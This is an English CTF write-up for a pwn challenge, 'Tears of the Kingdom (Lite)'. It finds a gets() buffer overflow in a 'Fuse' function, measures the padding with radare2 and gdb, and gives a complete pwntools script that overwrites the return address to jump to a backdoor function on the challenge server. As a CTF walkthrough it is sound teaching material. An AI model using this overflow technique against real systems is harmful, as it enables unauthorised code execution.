# [EN] Tears of the Kingdom (Lite) ###### tags: `Writeup` `Pwn` `English` > [name=FlyDragon] ## Step.1 By examining the source code, we can discover a buffer overflow vulnerability in the "Fuse" function. ```c= printf("What do you want to combine your Master Sword with?\n"); char item_buf[0xff]; gets(item_buf); printf("Wow, you get a Master %s Sword!\n", item_buf); ``` There is also a suspicious `backdoor()` function. The objective of this challenge is to exploit the buffer overflow to execute `backdoor()` and obtain the flag. ## Step.2 Use radare2 to examine the `backdoor()` function. ``` [0x00401110]> aaa [0x00401110]> afl [0x00401110]> pdf @ sym.backdoor ```  However, executing until `push rbp` causes an EOF (end-of-file) error. So we can directly jump to 0x401260. ## Step.3 Next, we need to calculate the padding. A segmentation fault occurs when the alphabet is repeated three times. Alphabet: ``` AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ ``` ``` (gdb) info register ``` ``` rbp 0x5252525251515151 0x5252525251515151 ``` 0x51 corresponds to 'Q' and 0x52 corresponds to 'R'. We can obtain the padding. ## Step.4 Add the padding, followed by 8 'A's to overwrite rbp, and then append the target address to jump to. Write a solving program: ```py= from pwn import * r = remote("lotuxctf.com", 10002) r.sendline("3") padding = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP" rbp = b'AAAAAAAA' add = p64(0x401260) r.sendline(padding+rbp+add) r.interactive() ``` {%hackmd M1bgOPoiQbmM0JRHWaYA1g %}